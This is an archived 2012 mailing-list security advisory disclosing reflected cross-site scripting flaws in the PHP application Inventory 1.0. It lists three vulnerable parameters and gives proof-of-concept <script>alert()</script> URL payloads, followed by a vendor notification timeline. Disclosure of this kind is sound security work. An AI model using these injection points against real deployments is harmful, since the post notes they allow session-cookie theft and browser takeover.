| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAJE=EcYYysDPO-FitpPybkrjnRTrgGh3M-2oRLHC8j2-gtmh3A@mail.gmail.com> Date: Fri, 26 Oct 2012 09:28:32 -0400 From: Thomas Richards <g13net@...il.com> To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com Subject: Inventory 1.0 Multiple XSS Vulnerabilities # Exploit Title: Inventory 1.0 Multiple XSS Vulnerabilities # Date: 10/19/12 # Author: G13 # Twitter: @g13net # Software Site: https://github.com/farevalod/inventory # Version: 1.0 # Category: webapp (php) # dc585 ##### ToC ##### 0x01 Description 0x02 XSS 0x03 Vendor Notification ##### 0x01 Description ##### PHP + SQL Inventory tracking system ##### 0x02 XSS ##### The Inventory application has multiple pages and parameters that are vulnerable to cross-site scripting. This vulnerabilities could be used to steal session cookies or take control of a client's browser. -----Vulnerable Pages----- http://localhost/inventory/consulta_fact.php?fact_num=[XSS] http://localhost/inventory/newinventario.php?sn=[XSS] http://localhost/inventory/newtransact.php?ref=[XSS] -----PoC Exploit----- http://localhost/inventory/consulta_fact.php?fact_num=<script>alert(1)</script> http://localhost/inventory/newinventario.php?sn=<script>alert(100)</script> http://localhost/inventory/newtransact.php?ref=<script>alert(100)</script> ##### 0x03 Vendor Notification ##### 10/19/12 - Vendor Notified 10/26/12 - No response, disclosure
Powered by blists - more mailing lists